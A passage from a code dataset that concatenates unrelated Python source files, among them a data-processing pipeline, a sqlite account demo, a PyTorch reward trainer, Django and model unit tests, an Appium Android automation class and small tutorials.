pd.to_datetime(dates[i+1]).year:\n dateRanges.append( (dates[i], dates[i+1]) )\n\n return dateRanges\n\n # create the subset of the weather data\n def subset_weather(dateRange, weather):\n mask = (weather['Date']>dateRange[0]) & (weather['Date'] <= dateRange[1])\n return weather.loc[mask]\n\n # create a dataframe that can be easily merged onto observations\n # merging by date and trap\n def TWeatherDFMaker(dct):\n toRet = pd.DataFrame().from_dict(dct)\n toRet = toRet.transpose()\n toRet.index = [idx for idx in toRet.index]\n toRet['Trap'] = toRet.index.map(lambda x: x[0])\n toRet['Date'] = toRet.index.map(lambda x: x[1])\n toRet.index = range(len(toRet))\n\n return toRet\n\n # For a single trap, call functions to aggregate weather\n def trap_agregator(trap_df, weather, avgTDict):\n trapWeather = {}\n trap = trap_df['Trap'].iloc[0]\n\n dates = trap_df['Date'].unique()\n dates = sorted(dates)\n\n dateRanges = date_ranges(dates)\n\n for dr in dateRanges:\n weather_sub = subset_weather(dr, weather)\n trapWeather[(trap, dr[1])] = calculate_agregate(weather_sub, avgTDict)\n toRet = pd.DataFrame().from_dict(trapWeather)\n\n return TWeatherDFMaker(trapWeather)\n\n # Take in data frame, output dataframe with aggregated weather to be merged\n\n def transform(df):\n observations = []\n\n traps = df['Trap'].unique()\n for t in traps:\n observations.append(trap_agregator(df[df['Trap'] == t],\n weather, avgTDict))\n toRet = pd.concat(observations, axis = 'rows')\n\n return toRet\n\n weatherTarget = './input/weather.csv'\n weather = yeildWeather(weatherTarget)\n avgTDict = yeildAvgTemp(weather)\n\n return transform(train), transform(test)\n\n# run steps in order, Print stubs deprecated for making sure dataframes\n# stay correct size\ndef ProcessPipeline(train, test):\n train, test = agg_on_species(train, test)\n #print('0',test.shape)\n train, test = InitPrepross(train, test)\n #print('1',test.shape)\n trainW, testW = WeatherProcess(train, test)\n\n trainL, testL = LocationProcess(train, test)\n trainL, testL = SVD(trainL, testL)\n\n train = train.merge(trainL, left_on = 'Location', right_index = True)\n test = test.merge(testL, left_on = 'Location', right_index = True)\n #print('3',test.shape)\n train = train.merge(trainW, on = ['Trap','Date'])\n test = test.merge(testW,on = ['Trap','Date'])\n #print('2',test.shape)\n\n return train, test\n","sub_path":"ProcessPipeline.py","file_name":"ProcessPipeline.py","file_ext":"py","file_size_in_byte":14250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529391110","text":"import sqlite3\nimport pytz\nimport datetime\n\"\"\"The modification in this codes from rollback1 is the {:.2f}\n just to avoid an error of floating in the end results and inexact amount\"\"\"\n\ndb = sqlite3.connect(\"accounts.sqlite\", detect_types=sqlite3.PARSE_DECLTYPES)\ndb.execute(\"CREATE TABLE IF NOT EXISTS accounts(name TEXT PRIMARY KEY NOT NULL,\"\n \"balance INTEGER NOT NULL)\") #Accounts table\ndb.execute(\"CREATE TABLE IF NOT EXISTS histories(time TIMESTAMP NOT NULL, account TEXT NOT NULL, \"\n \"amount INTEGER NOT NULL, PRIMARY KEY(time, account))\")\n#create a view from histories\ndb.execute(\"CREATE VIEW IF NOT EXISTS localhistory AS \"\n \"SELECT strftime('%Y-%m-%d %H:%M:%f', histories.time, 'localtime') AS localtime,\"\n \"histories.account, histories.amount FROM histories ORDER BY histories.time\")\n\nclass Account:\n \"\"\"Creating an acount with name\"\"\"\n @staticmethod\n def _current_time():\n return pytz.utc.localize(datetime.datetime.utcnow())\n\n def __init__(self, name: str, balance: int = 0):\n\n cursor = db.execute(\"SELECT name, balance FROM accounts WHERE (name = ?)\", (name,))\n row = cursor.fetchone()\n\n if row:\n self._name, self._balance = row\n print(\"Data retrieved for {}.\".format(self._name), end=\" \")\n else:\n self._name = name\n self._balance = balance\n cursor.execute(\"INSERT INTO accounts VALUES(?, ?)\", (name, balance))\n cursor.connection.commit()\n print(\"The account created for {}\".format(self._name))\n self.show_balance()\n\n def save_update(self, amount): # Created this to save the identical codes in deposit and withraw (commented)\n new_balance = self._balance + amount\n deposit_time = Account._current_time()\n db.execute(\"UPDATE accounts SET balance = ? WHERE (name = ?)\", (new_balance, self._name))\n db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (deposit_time, self._name, amount))\n db.commit()\n self._balance = new_balance\n\n def deposit(self, amount: int) -> float: # creating a deposit method\n if amount > 0:\n # new_balance = self._balance + amount\n # deposit_time = Account._current_time()\n # db.execute(\"UPDATE accounts SET balance = ? WHERE (name = ?)\",(new_balance, self._name))\n # db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (deposit_time, self._name, amount))\n # db.commit()\n # self._balance = new_balance\n self.save_update(amount)\n print(\"{:.2f} has been deposited on {}'s Account\".format(amount / 100, self._name))\n return self._balance / 100\n\n def withdraw(self, amount: int) -> float:\n if 0.0 < amount <= self._balance:\n # new_balance = self._balance - amount\n # withraw_time = Account._current_time()\n # db.execute(\"UPDATE accounts SET balance = ? WHERE (name = ?)\", (new_balance, self._name))\n # db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (withraw_time, self._name, -amount))\n # db.commit()\n # self._balance\n self.save_update(-amount)\n print(\"{:.2f} is withdrawn from {}'s Account\".format(amount / 100, self._name))\n return amount / 100\n else:\n print(\"THE AMOUNT HAS TO BE BETWEEN ZERO AND YOUR BALANCE\")\n return 0.0\n\n def show_balance(self): # a method that will display the balance\n print(\"The balance on {}'s account is {:.2f}\".format(self._name, self._balance / 100))\n\n\nif __name__ == '__main__':\n peter = Account(\"Peter\")\n peter.deposit(1010)\n peter.deposit(20)\n peter.withdraw(30)\n\n print(\"-\" * 40)\n\n vavic = Account(\"Evariste\")\n vavic.deposit(2010)\n vavic.deposit(40)\n vavic.withdraw(120)\n\n print(\"-\" * 40)\n jeanne = Account(\"Jeanne\")\n dianah = Account(\"Dianah\", 100)\n octave = Account(\"Octave\", 300)\n alex = Account(\"Alex\")\n donny = Account(\"Donny\", 500)\n\n db.close()\n","sub_path":"CreateDB/TestDB/rollback2.py","file_name":"rollback2.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47607682","text":"from abc import ABC, abstractmethod\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom models.choice import ChoiceModel\n\n\nclass AbstractRewardTrainerMixin(ABC):\n\n @abstractmethod\n def train_reward_model(self, preferences, epochs, pretraining=False, *args, **kwargs):\n pass\n\n\nclass RewardTrainerMixin(AbstractRewardTrainerMixin):\n def __init__(self, reward_model, batch_size=64, learning_rate=1e-3, summary_writing_interval=16):\n AbstractRewardTrainerMixin.__init__(self)\n self.choice_model = ChoiceModel(reward_model)\n self.optimizer = optim.Adam(self.choice_model.parameters(), lr=learning_rate)\n self.criterion = F.binary_cross_entropy\n self.batch_size = batch_size\n self.writer = SummaryWriter()\n self.writing_interval = summary_writing_interval\n self.global_training_step = 0\n\n def train_reward_model(self, preferences, epochs, pretraining=False, *args, **kwargs):\n train_loader = torch.utils.data.DataLoader(dataset=preferences, batch_size=self.batch_size)\n\n running_loss = 0.\n for epoch in range(epochs):\n\n for i, data in enumerate(train_loader, 0):\n queries, choices = data\n\n self.optimizer.zero_grad()\n\n choice_predictions = self.choice_model(queries).double()\n loss = self.criterion(choice_predictions, choices)\n\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n\n if self._is_writing_iteration(self.global_training_step):\n self._write_summary(running_loss, pretraining)\n running_loss = 0.0\n\n self.global_training_step += 1\n\n if pretraining:\n # reset global step after every round of pretraining\n self.global_training_step = 0\n\n def _is_writing_iteration(self, i):\n return i % self.writing_interval == self.writing_interval - 1\n\n def _write_summary(self, running_loss, pretraining):\n tag = \"training loss\"\n tag += \" (pretraining)\" if pretraining else \"\"\n average_loss = running_loss / self.writing_interval\n self.writer.add_scalar(tag,\n average_loss,\n self.global_training_step)\n","sub_path":"reward_model_training/reward_trainer.py","file_name":"reward_trainer.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91795914","text":"from collections import Counter\r\nfrom decimal import Decimal\r\nfrom random import seed\r\n\r\nfrom django.urls import reverse\r\nfrom rest_framework.test import APITestCase\r\nfrom rest_framework import status\r\n\r\nfrom calculator.models.blackbox import BlackBox, BlackBoxItem\r\nfrom calculator.models.product import Product\r\nfrom calculator.utils.blackbox import LOT_CATEGORIES\r\n\r\n\r\nseed(42)\r\n\r\n\r\nclass MockOpenTest(APITestCase):\r\n @classmethod\r\n def tearDownClass(cls):\r\n Product.objects.all().delete()\r\n super().tearDownClass()\r\n\r\n @classmethod\r\n def setUpClass(cls):\r\n super().setUpClass()\r\n cls.products = [Product.objects.create(name=f'Product #{i}',\r\n price=1000) for i in range(3)]\r\n for product in cls.products:\r\n product.save()\r\n\r\n cls.bb_1 = cls.create_bb('Box 1', 2000, cls.products, [1, 1, 1])\r\n cls.bb_2 = cls.create_bb('Box 2', 2000, cls.products, [10, 20, 30])\r\n\r\n @staticmethod\r\n def create_bb(name, price, products, amounts):\r\n bb = BlackBox.objects.create(name=name, price=price, loyalty=0.6, rentability=0.3)\r\n items = [BlackBoxItem.objects.create(\r\n black_box=bb, product=product, amount=amount\r\n ) for product, amount in zip(products, amounts)]\r\n for item in items:\r\n item.save()\r\n bb.save()\r\n return bb\r\n\r\n def test_mock_open_small(self):\r\n res = self.bb_1.mock_open(3)\r\n self.assertEqual(set(res), set(LOT_CATEGORIES))\r\n res = self.bb_1.mock_open(0)\r\n self.assertEqual(res, [])\r\n\r\n def test_mock_open_large(self):\r\n res = self.bb_2.mock_open(60)\r\n self.assertEqual(Counter(res), Counter(\r\n {'costly': 10, 'middle': 20, 'cheap': 30}\r\n ))\r\n res = self.bb_2.mock_open(1000)\r\n self.assertEqual(Counter(res), Counter(\r\n {'costly': 10, 'middle': 20, 'cheap': 30}\r\n ))\r\n\r\n def test_api(self):\r\n pk = self.bb_1.pk\r\n response = self.client.post(reverse('blackbox-detail', args=[pk]) + 'mock_open/', data={'n': 10})\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n data = response.json()\r\n self.assertEqual(set(data['product_categories']), set(LOT_CATEGORIES))\r\n\r\n def test_rentability_is_never_negative(self):\r\n products = [Product.objects.create(name=f'Product {i}', price=i*100) for i in range(1, 4)]\r\n bb = self.create_bb('Box 3', 170, products, [1, 2, 3])\r\n cat_map = bb.lot_cost()\r\n for _ in range(10):\r\n res = bb.mock_open(6)\r\n total_giveaway = 0\r\n for i, category in enumerate(res):\r\n total_giveaway += cat_map[category]\r\n self.assertLessEqual(total_giveaway, Decimal((i + 1) * 170), msg=f'{i}th iteration')\r\n\r\n def test_mock_open_unsaved_api(self):\r\n data = {\r\n 'name': 'Box 3',\r\n 'price': 170,\r\n 'lot_cost': {'costly': 300, 'middle': 200, 'cheap': 100},\r\n 'lot_amount': {'costly': 1, 'middle': 2, 'cheap': 3},\r\n 'n': 6\r\n }\r\n response = self.client.post(reverse('blackbox-list') + 'mock_open_unsaved/',\r\n data=data, format='json')\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n res = response.json()['product_categories']\r\n self.assertEqual(Counter(res), Counter(data['lot_amount']))\r\n","sub_path":"gamification/calculator/tests/test_mock_open.py","file_name":"test_mock_open.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52653243","text":"#!/usr/bin/env python\n# Plot heatmap of MinHash sketch comparisons by BBTool's sketch.sh/comparesketch.sh.\n# Fredrik Boulund 2018\n\nfrom sys import argv, exit\nimport argparse\n\nimport matplotlib as mpl\nmpl.use(\"agg\")\nmpl.rcParams.update({'figure.autolayout': True})\n\nimport pandas as pd\nimport seaborn as sns\n\n\ndef parse_args():\n desc = \"Plot heatmap of sketch comparisons.\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument(\"alltoall\", metavar=\"alltoall\",\n help=\"Output table from comparesketch.sh in format=3.\")\n parser.add_argument(\"-o\", \"--outfile\", dest=\"outfile\", metavar=\"FILE\",\n default=\"all_vs_all.pdf\",\n help=\"Write heatmap plot to FILE [%(default)s].\")\n if len(argv) < 2:\n parser.print_help()\n exit(1)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n options = parse_args()\n \n colnames = [\"Query\", \"Ref\", \"ANI\", \"QSize\", \"RefSize\", \"QBases\"]\n df = pd.read_csv(\n options.alltoall, \n sep=\"\\t\", \n index_col=False, \n skiprows=1,\n names=colnames)\n print(\"Loaded data for {} sample comparisons.\".format(df.shape[0]))\n\n similarity_matrix = df.pivot(index=\"Query\", \n columns=\"Ref\", values=\"ANI\").fillna(100)\n\n g = sns.heatmap(similarity_matrix, annot=True, fmt=\"2.1f\", annot_kws={\"fontsize\": 5})\n g.set_title(\"Sample similarity\")\n g.set_yticklabels(g.get_yticklabels(), rotation=0)\n g.set_ylabel(\"\")\n g.set_xlabel(\"\")\n\n g.get_figure().savefig(options.outfile)\n","sub_path":"scripts/plot_sketch_comparison_heatmap.py","file_name":"plot_sketch_comparison_heatmap.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443008960","text":"#!/usr/bin/env python\n\"\"\"\n\nCopyright (c) 2019, Kristoffer Paulsson \n\nThis file is distributed under the terms of the MIT license.\n\n\nArchive7 cython build script.\"\"\"\nfrom glob import glob\nfrom os import path\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\n\n\nbase_dir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(base_dir, 'README.md')) as desc:\n long_description = desc.read()\n\nwith open(path.join(base_dir, 'version.py')) as version:\n exec(version.read())\n\nsetup(\n name=\"archive7\",\n version=__version__, # noqa F821\n license='MIT',\n description='A safe messaging system',\n author=__author__, # noqa F821\n author_email=__author_email__, # noqa F821\n long_description=long_description, # noqa F821\n long_description_content_type='text/markdown',\n url=__url__, # noqa F821\n # project_urls={\n # \"Bug Tracker\": \"https://bugs.example.com/HelloWorld/\",\n # \"Documentation\": \"https://docs.example.com/HelloWorld/\",\n # \"Source Code\": \"https://code.example.com/HelloWorld/\",\n # }\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications :: Gnome',\n 'Framework :: AsyncIO',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Religion',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Telecommunications Industry',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX',\n 'Programming Language :: Cython',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Security',\n 'Topic :: System :: Archiving',\n 'Topic :: Utilities',\n ],\n zip_safe=False,\n test_suite='',\n python_requires='~=3.7',\n setup_requires=[\n 'cython', 'sphinx', 'sphinx_rtd_theme', 'libnacl'],\n install_requires=[],\n # namespace_packages=['archive7'],\n packages=['archive7'],\n scripts=glob('bin/*'),\n ext_modules=cythonize(\n 'src/archive7/**.pyx',\n build_dir=\"build\", compiler_directives={\n 'language_level': 3, 'embedsignature': True})\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225758882","text":"#!/usr/bin/env python3\n\n############################################################################################\n# #\n# Program purpose: Create an intersection of sets. #\n# Program Author : Happi Yvan #\n# Creation Date : December 24, 2019 #\n# #\n############################################################################################\n\nfrom random import randint\n\ndef random_set_data(low: int, high: int, size: int) -> set:\n if size < 0:\n raise ValueError(f'Invalid size ({size}) for new set')\n return set([randint(low, high) for _ in range(size)])\n\nif __name__ == \"__main__\":\n set_A = random_set_data(low=0, high=10, size=15)\n set_B = random_set_data(low=0, high=10, size=15)\n\n print(f'Set A: {set_A}')\n print(f'Set B: {set_B}')\n print(f'Intersection of sets: {set_A & set_B}')","sub_path":"Projects/Online Workouts/w3resource/Sets/program-6.py","file_name":"program-6.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46112669","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport os\n\nimport datetime\n\nimport re\nfrom appium import webdriver\nfrom appium.webdriver.webelement import WebElement\n\nfrom Framework.Utils.Validate import validate\nfrom Framework.Exception import ATException\nfrom Framework import Log\nfrom UserControlLib.Manager import Manager\nfrom UserControlLib.Page.MainPageBase import MainPageBase\nfrom UserControlLib.Page.PageBase import PageBase\n\n\nclass AndroidPhone(object):\n NAME_LIST = {}\n\n @validate(command_executor=str, params=dict)\n def __init__(self, command_executor='http://127.0.0.1:4444/wd/hub', params=dict()):\n \"\"\"create a AndroidPhone\n Args:\n params(dict):\n like: params = {\n 'platformName': {'types': str, 'optional': False},\n 'platformVersion': {'types': str, 'optional': False},\n 'deviceName': {'types': str, 'optional': False},\n 'appPackage': {'types': str, 'optional': False},\n 'app': {'types': str, 'optional': True}\n }\n \"\"\"\n self.logger = Log.getLogger(self.__module__)\n self.desired = {}\n self.id = params.pop('id')\n self.platform = 'Android'\n while params['name'] in AndroidPhone.NAME_LIST:\n params['name'] += str(time.time())\n AndroidPhone.NAME_LIST.update({self.id: params['name']})\n self.name = params['name']\n\n self.desired['platformName'] = self.platform\n self.desired['platformVersion'] = params.get('version')\n self.desired['deviceName'] = params.get('name')\n self.desired['appPackage'] = params.get('app_package')\n self.desired['app'] = os.path.abspath(params.get('app_location'))\n self.desired['unicodeKeyboard'] = True\n self.desired['resetKeyboard'] = True\n self.desired['newCommandTimeout'] = 240\n\n self.account = params.get('account', {})\n self.logger.debug('To connect an android device: \\n Platform[%s]\\n Version[%s]\\n Name[%s]'\n % (self.desired['platformName'], self.desired['platformVersion'], self.desired['deviceName']))\n self.command_executor = command_executor\n self.driver = None\n self.__lastPage = None\n self.__currentPage = None\n self.pageManager = Manager(self)\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.width = 480\n self.height = 800\n if self.driver:\n size = self.driver.get_window_size()\n self.width = size['width']\n self.height = size['height']\n self.logger.debug('The Android[%s] window size: width[%s] height[%s].' %\n (self.getPhoneId(), str(self.width), str(self.height)))\n\n def __waitInitComplete(self):\n self.__lastPage = None\n self.__currentPage = self.pageManager.getSpecPage(self, 'Welcome')\n sign = False\n timeIndex = int(time.time())\n while int(time.time()) - timeIndex <= 30:\n try:\n ele = self.getElement(alias='start', force=True)\n except Exception:\n time.sleep(1)\n continue\n else:\n if not ele:\n time.sleep(1)\n continue\n sign = True\n break\n if sign:\n self.logger.debug('The initialization of Android device [%s] is complete.' % self.id)\n else:\n self.logger.error('The initialization of Android device [%s] is timeout in 30 seconds.' % self.id)\n\n def __initDriver(self, command_executor, params):\n self.driver = webdriver.Remote(command_executor, params, keep_alive=True)\n self.__waitInitComplete()\n\n def getElement(self, alias=None, force=False, way='xpath', text=None):\n \"\"\"To get a WebElement instance of specified alias\n Args:\n way (str) : 获取元素方式,默认为'xpath', 'xpath', 'id', 'name'可选\n alias (str) : 元素别名\n force (str) : 是否强制获取\n text (str) : way是xpath时,覆盖xpath的text过滤属性,text为ignore时,去掉text的过滤属性\n \"\"\"\n try:\n ele = self.__currentPage.getElement(alias=alias, force=force, way=way, text=text)\n except Exception as e:\n raise ATException(e.message)\n else:\n return ele\n\n def getSpecElementText(self, element=None, alias=None):\n \"\"\"To get the text value of a WebElement instance\n Args:\n element (WebElement) : 元素别名\n alias (str) : 是否强制获取\n \"\"\"\n txt = ''\n if element and isinstance(element, WebElement):\n try:\n txt = element.text.encode('utf-8')\n except Exception as e:\n pass\n else:\n txt = element.text\n elif alias and isinstance(alias, str):\n ele = self.getElement(alias=alias, force=True)\n try:\n txt = ele.text.encode('utf-8')\n except Exception as e:\n txt = ele.text\n\n else:\n raise ATException('Method getSpecElementText() must give a param element(WebElement) or alias(str).')\n self.logger.debug('The text value of the specified element is \\'%s\\'.' % txt)\n return txt\n\n def doAction(self, alias=None, element=None, action=None, value=None, text=None):\n \"\"\"deal with the events of element\n\n Args:\n alias (str) : 元素在xml文件中的别名,与element互斥\n\n element (WebElement): 处理事件的元素对象,与alias互斥\n\n action (str) : 事件名称\n name | description\n =================================\n click | 单击元素\n double_click | 单击元素\n swipe_up | 向上滑动\n swipe_down | 向下滑动\n swipe_right | 向右滑动\n swipe_left | 向左滑动\n scroll_vertical | 上下滚动元素\n scroll_transverse| 左右滚动元素\n input | 字符输入\n\n value (str) : 输入的字符\n\n text: (str) : 指定alias参数时,覆盖xpath的text过滤属性,text为ignore时,去掉text的过滤属性\n \"\"\"\n if alias:\n ele = self.getElement(alias=alias, text=text)\n if not ele:\n raise ATException('The WebElement alias[%s] can not be located in current page[%s]'\n % (alias, self.getCurrentPage().getTitle()))\n self.logger.info(\"In current page [%s], the located element is [%s] and will do action [%s].\"\n % (self.__currentPage.getTitle(), alias, action))\n self.getCurrentPage().doAction(element=ele, action=action, value=value)\n elif element:\n if isinstance(element, WebElement):\n self.logger.info(\"In current page [%s], the located element is [%s] and will do action [%s].\"\n %\n (self.getCurrentPage().getTitle(), self.getCurrentPage()._getAlias(element=element), action))\n self.__currentPage.doAction(element=element, action=action, value=value)\n else:\n raise ATException('Function: [doAction] param: [element] must '\n 'be a instance of appium.webdriver.webelement.WebElement, \\nbut is [%s]'\n % type(element))\n else:\n raise ATException('Function: [doAction] param: [element] or [alias] must '\n 'be specified only and at least one.')\n\n def setCurrentPage(self, page):\n \"\"\"\n \"\"\"\n if isinstance(page, PageBase):\n if page != self.__currentPage:\n self.__lastPage = self.__currentPage\n self.__currentPage = page\n else:\n raise ATException('Object [%s] property must be a instance of PageBase.' % page)\n self.logger.info(\"To set the current page: [%s] successfully.\" % self.__currentPage.getTitle())\n\n def getCurrentPage(self):\n self.logger.info(\"To get the current page: [%s] successfully.\" % self.__currentPage.getTitle())\n return self.__currentPage\n\n def getLastPage(self):\n self.logger.info(\"To get the current page: [%s] successfully.\" % self.__lastPage.getTitle())\n return self.__lastPage\n\n def setLastPage(self, page):\n if isinstance(page, PageBase):\n self.__lastPage = page\n else:\n raise ATException('Object [%s] property must be a instance of PageBase.' % page)\n self.logger.debug(\"To set the last page: [%s] successfully.\" % self.__lastPage.getTitle())\n\n\n def setPhoneId(self, id):\n self.id = id\n\n def getPhoneId(self):\n return self.id\n\n def getScreenShot(self, desPath=None):\n \"\"\"\n \"\"\"\n if self.driver:\n pngName = '%s.png' % datetime.datetime.now().strftime('%Y-%m-%d-%H_%M_%S')\n if desPath:\n pngFile = os.path.join(desPath, pngName)\n else:\n pngFile = os.path.join(Log.baseConfig['logDir'], pngName)\n self.driver.get_screenshot_as_file(pngFile)\n self.logger.info('Capture the screen of the current page [%s] successfully,\\nFile: [%s]'\n % (self.__currentPage.getTitle(), pngFile))\n return\n self.logger.info(\n 'Capture the screen of the current page [%s] failed, because the driver unavailable.' % self.__currentPage.getTitle())\n\n def __wetherCurrentIsMainPage(self):\n try:\n if self.driver.find_element_by_name('首页') and self.driver.find_element_by_name('出诊') \\\n and self.driver.find_element_by_name('我的'):\n return True\n else:\n return False\n except Exception as e:\n return False\n\n def login(self, way=None, name=None, password=None):\n \"\"\"To login APP\n\n Args:\n way (str): 登录方式,'password' or 'code'\n name (str): 登录账号\n password(str): 登录密码或验证码\n \"\"\"\n if self.__currentPage.getTitle() == 'Welcome':\n self.doAction(alias='start', action='click')\n if not way:\n if self.account['way'] == 'password':\n self.doAction(alias='account_frame', action='swipe_left')\n time.sleep(2)\n self.doAction(alias='username_edit_text', action='input', value=self.account['user'])\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n elif self.account['way'] == 'code':\n self.doAction(alias='user_edit_text', action='input', value=self.account['user'])\n time.sleep(2)\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n if self.getCurrentPage().getTitle() != 'Home_dynamic':\n raise ATException('Login app failed.')\n elif isinstance(self.__currentPage, MainPageBase):\n self.arriveSpecMainPage(main='home')\n else:\n self.rebootApp()\n self.login()\n\n def rebootApp(self):\n \"\"\"reboot app\n \"\"\"\n if self.driver:\n self.driver.quit()\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.__waitInitComplete()\n else:\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.__waitInitComplete()\n\n def __del__(self):\n\n try:\n self.logger.info(\"Exit the connected Android Phone ID: [%s]\" % self.getPhoneId())\n self.driver.quit()\n except ATException:\n pass\n\n def arriveSpecMainPage(self, main='home'):\n \"\"\"到达指定的主页面\n Args\n main (str) : 主页面名称, home, visits, mine, message, circle\n \"\"\"\n if self.__wetherCurrentIsMainPage():\n self.setCurrentPage(self.pageManager.getSpecPage(phone=self, title='Home_dynamic'))\n self.doAction(alias=main, action='click')\n elif self.getCurrentPage().getTitle() == 'Welcome':\n self.login()\n elif re.match('Login', self.getCurrentPage().getTitle()):\n if self.account['way'] == 'password':\n self.doAction(alias='account_frame', action='swipe_left')\n time.sleep(2)\n self.doAction(alias='username_edit_text', action='input', value=self.account['user'])\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n elif self.account['way'] == 'code':\n self.doAction(alias='account_frame', action='swipe_right')\n self.doAction(alias='user_edit_text', action='input', value=self.account['user'])\n time.sleep(2)\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n else:\n try:\n ele = self.getCurrentPage().getElement(\n alias='net.medlinker.medlinker:id/positive_button', way='id', force=True)\n except Exception:\n pass\n else:\n self.doAction(element=ele, action='click')\n self.arriveSpecMainPage(main=main)\n\n try:\n ele = self.getCurrentPage().getElement(\n alias='net.medlinker.medlinker:id/left_button_layout', way='id', force=True)\n except Exception:\n pass\n else:\n self.doAction(element=ele, action='click')\n self.arriveSpecMainPage(main=main)\n\n def scrollToExact(self, direction, text, element=None, alias=None):\n self.__currentPage._scrollToExact(direction=direction, text=text, element=element, alias=alias)\n\n def scrollScreen(self, direction, count=1):\n self.__currentPage.scrollScreen(direction=direction, count=count)\n","sub_path":"UserControlLib/AndroidPhone.py","file_name":"AndroidPhone.py","file_ext":"py","file_size_in_byte":14723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"467238002","text":"#Operator overloading\n\na=5\nb='World'\nc=6\n#print(a+b)\nprint(a+c)\nint.__add__(a,c)\na='a'\nb='e'\nstr.__add__(a,b)\n\n\nclass Student:\n def __init__(self,m1,m2):\n self.m1=m1\n self.m2=m2\n\n def __add__(self, other):\n m1=self.m1+other.m1\n m2=other.m2+other.m2\n s3=Student(m1,m2)\n return s3\n def __gt__(self, other):\n s1=self.m1+self.m2\n s2=other.m1+other.m2\n if s1>s2:\n return True\n else:\n return False\n\n def __str__(self):\n return \"{}{}\".format(self.m1,self.m2)\n\ns1=Student(55,65)\ns2=Student(95,99)\n#s3=s1+s2\nif s1>s2:\n print(\"s1 wins\")\nelse:\n print(\"s2 wins\")\n\na=9\nprint(a.__str__())\nprint(s1)\nprint(s1.__str__())\n\n\n","sub_path":"59_Polymorphism.py","file_name":"59_Polymorphism.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"612306112","text":"import os\nimport pytest\n\nfrom dynamallow.model import MarshModel\nfrom dynamallow.exceptions import InvalidSchemaField, MissingTableAttribute, MarshModelException\nif 'marshmallow' in (os.getenv('SERIALIZATION_PKG') or ''):\n from marshmallow.fields import String\n from marshmallow.fields import Number\nelse:\n from schematics.types import StringType as String\n from schematics.types import IntType as Number\n\n\ndef test_missing_inner_classes():\n \"\"\"Classes must have both a Table and Schema inner class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n pass\n\n\ndef test_missing_inner_schema_class():\n \"\"\"Classes must have an inner Schema class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n class Table:\n pass\n\n\ndef test_missing_inner_table_class():\n \"\"\"Classes must have an inner Table class\"\"\"\n with pytest.raises(MarshModelException):\n class Model(MarshModel):\n class Schema:\n pass\n\n\ndef test_table_validation():\n \"\"\"Defining a model with missing table attributes should raise exceptions\"\"\"\n with pytest.raises(MissingTableAttribute):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n\n class Schema:\n foo = String(required=True)\n\n\ndef test_invalid_hash_key():\n \"\"\"Defining a model where ``hash_key`` in Table points to an invalid field should raise InvalidSchemaField\"\"\"\n with pytest.raises(InvalidSchemaField):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n read = 1\n write = 1\n\n class Schema:\n bar = String(required=True)\n\n\ndef test_invalid_range_key():\n \"\"\"Defining a model where ``range_key`` in Table points to an invalid field should raise InvalidSchemaField\"\"\"\n with pytest.raises(InvalidSchemaField):\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n range_key = 'bar'\n read = 1\n write = 1\n\n class Schema:\n foo = String(required=True)\n baz = String(required=True)\n\n\ndef test_number_hash_key():\n \"\"\"Test a number hash key and ensure the dynamo type gets set correctly\"\"\"\n class Model(MarshModel):\n class Table:\n name = 'table'\n hash_key = 'foo'\n read = 1\n write = 1\n\n class Schema:\n foo = Number(required=True)\n baz = String(required=True)\n\n model = Model(foo=1, baz='foo')\n assert 